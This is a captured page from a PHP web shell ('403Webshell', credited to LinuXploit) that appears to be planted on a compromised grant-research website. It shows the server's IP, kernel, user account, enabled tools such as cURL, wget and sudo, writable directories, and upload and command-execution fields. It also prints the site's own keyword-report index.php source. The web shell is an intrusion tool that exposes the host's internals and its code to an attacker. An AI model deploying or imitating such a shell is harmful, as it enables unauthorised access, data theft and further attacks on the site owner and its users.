403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/americasgotgrants.com/vx/reports/keywords/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/americasgotgrants.com/vx/reports/keywords/index.php
<?
/**
  * This framework has been created for a multitude of grant research websites.
  *
  * @copyright 2016-2021 Synergy Pro Marketing
  * @author Aaron Campbell <aaron@synergymentoring.com>
  *	@license None, All Rights Reserved
  * @package Business
  */
  
  
  
  include_once($_SERVER['DOCUMENT_ROOT']."/vx/lib/inc.php"); 
  	
	$key = $_REQUEST['key'];
	if(!valid_key($key, $db, true))
	{
		return false;
		exit;
	}
	else
	{

		$keywords = $db->query("
									SELECT 
											*
									FROM grdb.grd_keyword_searches
									WHERE 
											site_code = '$siteCode'
									ORDER BY rank DESC
								");

		$wordList = array();
		$termList = array();
		$w = 0;
		$t = 0;
		for($i=0; $i<count($keywords); $i++)
		{
			if(!empty($keywords[$i]['word']) && $keywords[$i]['rank'] > 1)
			{
				$wordList[$w]['rank'] = $keywords[$i]['rank'];
				$wordList[$w]['word'] = $keywords[$i]['word'];
				$w++;
			}
			else if(!empty($keywords[$i]['term']) && $keywords[$i]['rank'] > 1)
			{
				$termList[$t]['rank'] = $keywords[$i]['rank'];
				$termList[$t]['term'] = $keywords[$i]['term'];
				$t++;
			}
		}
		
		echo '<h1>'.count($keywords).' Keyword Searches</h1>';
		echo '<h2>'.count($wordList).' Word Searches With High Rank</h2>';
		echo '<pre>';
			print_r($wordList);
		echo '</pre>';
		
		echo '<h2>'.count($termList).' Term Searches With High Rank</h2>';
		echo '<pre>';
			print_r($termList);
		echo '</pre>';
		
	  	include_once($_SERVER['DOCUMENT_ROOT']."/vx/layout/body.php");
	}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit